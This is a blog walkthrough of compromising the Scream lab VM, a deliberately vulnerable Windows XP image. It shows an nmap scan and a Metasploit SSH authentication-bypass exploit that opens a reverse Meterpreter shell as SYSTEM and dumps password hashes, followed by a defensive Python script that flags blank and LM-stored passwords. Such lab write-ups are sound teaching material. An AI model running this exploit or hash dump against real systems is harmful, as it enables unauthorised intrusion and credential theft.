Scream VM – The Easy Way

So this one was more work to build than it was to crack… That being said, there is a harder way, so stay tuned for that 🙂

– Download ISO
– Download Scream.exe
– Install .NET 4.0
– Run Scream.exe, point it to the ISO and give it an XP license key.
– Choose a place to save the ISO file it creates.
– Use the resulting ISO file to build a VM.

Enumeration

# Nmap 6.47 scan initiated Tue Jan 20 21:02:29 2015 as: nmap -Pn -T4 -sS -sV -oN results/172.16.28.135/172.16.28.135-tcp-standard.txt -oG results/172.16.28.135/172.16.28.135-tcp-greppable.txt 172.16.28.135
Nmap scan report for 172.16.28.135
Host is up (0.00047s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)
23/tcp open  domain  ISC BIND login
80/tcp open  http    Tinyweb httpd 1.93
MAC Address: 00:0C:29:D0:FC:44 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done at Tue Jan 20 21:03:18 2015 -- 1 IP address (1 host up) scanned in 49.01 seconds

We see a few interesting ports and services. The one that stands out to me the most is:

22/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)

A quick search for “WeOnlyDo ssh” brings me here:
http://www.exploit-db.com/exploits/23080/

Exploitation

Found a Metasploit module to help with the testing…

use exploit/windows/ssh/freesshd_authbypass


msf exploit(freesshd_authbypass) > set RhOST 172.16.28.135
RhOST => 172.16.28.135
msf exploit(freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOST      172.16.28.135                                                  yes       The target address
   RPORT      22                                                             yes       The target port
   USERNAME                                                                  no        A specific username to try
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       File containing usernames, one per line


Exploit target:

   Id  Name
   --  ----
   0   Freesshd <= 1.2.6 / Windows (Universal)


msf exploit(freesshd_authbypass) > exploit

[*] Started reverse handler on 172.16.28.245:4444
[*] Trying username '4Dgifts'
[*] Trying username 'EZsetup'
[*] Trying username 'OutOfBox'
[*] Trying username 'ROOT'
[*] Trying username 'adm'
[*] Trying username 'admin'
[*] Uploading payload, this may take several minutes...
[*] Sending stage (770048 bytes) to 172.16.28.135
[*] Meterpreter session 1 opened (172.16.28.245:4444 -> 172.16.28.135:1248) at 2015-01-20 22:18:01 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3160 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>hostname
hostname
Scream

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:64e03ce932ed854fada1b28703190507:dad93a52ba6e7a70cd49350c40909237:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b1589ba9c1a23c5ddbbb738159f15540:::
meterpreter >
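The hashdump above tells a defender more than "the box is owned": in pwdump format (user:RID:LM:NT:::) the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty password, and any LM field other than aad3b435b51404eeaad3b435b51404ee means a crackable LM hash is still being stored. The script below is an added example (not part of the original post or of Metasploit) that parses those lines and reports which accounts on Scream are weak on that evidence alone; the input is copied from the session output.

```python
import re

# Well-known hash values of the empty password (public constants, not secrets)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Input copied from the hashdump in the meterpreter session above
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alex:1003:aad3b435b51404eeaad3b435b51404ee:504182f8417ed8557b67e96adc8b4d04:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:64e03ce932ed854fada1b28703190507:dad93a52ba6e7a70cd49350c40909237:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b1589ba9c1a23c5ddbbb738159f15540:::
"""

# pwdump line layout: user:RID:LM-hash:NT-hash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return rows

def audit(text):
    """Map each weak account to the list of weaknesses visible from its hashes alone."""
    findings = {}
    for user, rid, lm, nt in parse_hashdump(text):
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            # An LM hash is stored only when the password is at most 14 characters
            # and the NoLMHash policy is off; LM upper-cases the password and hashes
            # two 7-character halves independently, so it is cracked quickly.
            issues.append("LM hash stored")
        if rid == 500 and issues:
            issues.append("built-in Administrator (RID 500) affected")
        if issues:
            findings[user] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit(HASHDUMP).items():
        print(f"{user}: {', '.join(issues)}")
```

On this dump the built-in Administrator and Guest both have blank passwords, and HelpAssistant still has an LM hash stored; disabling LM storage and setting real passwords are the fixes, independent of patching the SSH service.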


The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.